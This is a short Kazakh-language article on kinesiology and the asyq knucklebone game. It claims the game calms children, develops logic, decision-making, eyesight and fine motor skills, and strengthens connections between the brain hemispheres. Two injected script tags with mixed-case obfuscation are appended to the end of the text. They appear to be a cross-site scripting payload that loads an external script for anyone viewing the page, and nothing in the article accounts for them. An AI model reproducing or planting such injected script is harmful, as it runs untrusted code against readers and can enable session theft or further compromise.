Кинезиология - бұлшық еттің барлық қозғалысын зерттейтін ғылыми және практикалық пән. Оның үстіне баланың психикалық дамуына асық ойыны үлкен рөл атқарады. Асық ойнау кезіндегі мида болатын процестер біріншіден, баланы тыныштандырады, екіншіден, логикалық ойлау қабілетін дамытады, ал үшіншіден баланы кез келген жағдайда шешім қабылдауға үйретеді. Сонымен қатар, домалаған асықты бақылап, көз бұлшық еттерін қозғалтуы көру қабілетіне де оң әсер етеді. Сол сияқты, асық шиірген уақытта баланың ұсақ моторикасы дамиды. Ал ұсақ моторика тікелей миға байланысты. Оң жақ жарты шар және сол жақ жартышардың арасындағы нейрондар байланысы күшейеді. Баланың логикалық ойлауы жақсарады. Саусақтағы ұсақ моториканың дамуы ол - мидың дамуы екенін білгеніміз жөн. Асық баланың өлшемдік танымын дамытып, мергендікке баулиды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>